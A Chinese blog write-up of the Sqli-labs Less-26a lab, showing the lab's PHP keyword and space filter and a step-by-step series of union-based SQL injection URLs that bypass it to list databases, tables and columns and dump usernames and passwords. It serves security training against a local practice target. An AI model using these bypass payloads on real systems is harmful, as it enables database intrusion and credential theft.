zoukankan      html  css  js  c++  java
  • Sqli-labs Less-26a 绕过 or、and、注释符、空格、斜杠过滤 union注入

    关键代码

    function blacklist($id)
    {
        $id= preg_replace('/or/i',"", $id);            //strip out OR (non case sensitive)
        $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)
        $id= preg_replace('/[/*]/',"", $id);        //strip out /*
        $id= preg_replace('/[--]/',"", $id);        //Strip out --
        $id= preg_replace('/[#]/',"", $id);            //Strip out #
        $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
        $id= preg_replace('/[s]/',"", $id);        //Strip out spaces
        $id= preg_replace('/[/\\]/',"", $id);        //Strip out slashes
        return $id;
    }
    $id=$_GET['id'];
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    //print_r(mysql_error());

    这关与less26的区别在于,sql语句添加了一个括号,同时在sql语句执行抛出错误后并不在前台页面输出。所以我们排除报错注入,这里利用union注入。

    我们构造payload:

    http://127.0.0.1/sqllib/Less-26a/?id=100')union%a0select%a01,2,3||('1

    Explain:基础与less26一致,我们直接用 ') 闭合前面的,然后跟上自己构造的注入语句即可。最后利用('1 进行闭合即可。

    1、爆当前数据库

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,database(),('3

    将空格替换为%a0

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,database(),('3

    2、爆数据库

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(schema_name) from information_schema.schemata),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(schema_name)%a0from%a0infoorrmation_schema.schemata),('3

    3、爆数据表

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'),('3

    4、爆数据列

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),('3

    将空格替换为%a0,将information_schema替换为infoorrmation_schema,将and替换为aandnd

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0aandnd%a0table_name='users'),('3

    5、爆内容

    http://127.0.0.1/sql/Less-26a/?id=100')union select 1,(select group_concat(username,0x3a,password) from users),('3

    将空格替换为%a0,将password替换为passwoorrd

    http://127.0.0.1/sql/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(username,0x3a,passwoorrd)%a0from%a0security.users),('3

  • 相关阅读:
    51 Nod 1013 3的幂的和 矩阵链乘法||逆元+快速幂
    poj3580 序列之王 fhqtreap
    bzoj1503: [NOI2004]郁闷的出纳员 fhqtreap版
    bzoj1251: 序列终结者 fhqtreap写法
    bzoj4864: [BeiJing 2017 Wc]神秘物质
    bzoj3786 星际探索 splay dfs序
    bzoj1861 书架 splay版
    bzoj1503 郁闷的出纳员 splay版
    网络转载:局域网安全:解决ARP攻击的方法和原理
    黑客的故事
  • 原文地址:https://www.cnblogs.com/zhengna/p/12655081.html
Copyright © 2011-2022 走看看